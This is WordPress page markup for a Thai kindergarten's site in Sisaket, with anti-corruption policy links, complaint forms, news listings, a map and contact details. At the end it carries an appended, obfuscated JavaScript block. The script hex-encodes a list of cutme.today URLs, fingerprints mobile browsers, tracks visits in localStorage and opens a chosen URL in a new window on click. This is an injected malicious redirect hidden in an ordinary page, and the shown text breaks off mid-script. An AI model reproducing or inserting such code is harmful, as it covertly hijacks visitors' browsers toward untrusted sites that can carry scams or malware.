900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\" data-type=\"link\" data-id=\"https://www.facebook.com/share/p/sdXD4yi68yYAMbpR/\">ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินบนหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1W1gQsQUPnpERA_nlDfD3InVipLL6lnBt/view?usp=drive_link\">การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1NK3-A2RUV5X8wgneATtANg0LWcCiaydb/view?usp=share_link\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"76fbe2ef\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"19_91838d-0f\",\"columns\":[1,1,1,1,1,1],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"https://docs.google.com/forms/d/e/1FAIpQLSeE1kKWcuOnYJpmEpbv5v8OHwhaZOO-bGbJU1Pe52CMO-1qTg/viewform?usp=share_link\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://forms.gle/ogsMCed1YfypogeK8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"https://forms.gle/ZyUhBS2TYmZiZVPR6\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"https://forms.gle/6upfY9jUcbu2kPti8\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"news\"}],\"meta-fieldsfSize\":{\"md\":11},\"headingBgColor\":\"#00000000\",\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":11},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":45},\"thumbnailHeight\":{\"md\":260},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titlefSize\":{\"md\":18},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"q4ud2298\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"จดหมายข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"จดหมายประชาสัมพันธ์\",\"value\":\"%e0%b8%88%e0%b8%94%e0%b8%ab%e0%b8%a1%e0%b8%b2%e0%b8%a2%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"headingWeight\":\"600\",\"headingfSize\":{\"md\":24},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d1925.9723083104054!2d104.32273680156584!3d15.106380799999997!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116e380deaa317f%3A0x4d9751ab2c19279f!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lit4LiZ4Li44Lia4Liy4Lil4Lin4Lix4LiU4Lie4Lij4Liw4LmC4LiVICjguJ3guYjguLLguKLguKHguLHguJjguKLguKEp!5e0!3m2!1sth!2sth!4v1722088475215!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนอนุบาลวัดพระโต</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">1193 ถนนขุขันธ์ ตำบลเมืองเหนือ อำเภอเมืองศรีสะเกษ จังหวัดศรีสะเกษ 33000</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ : 0-4561-2730</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2Fprofile.php%3Fid%3D61556083436494&tabs=timeline&width=330&height=80&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new 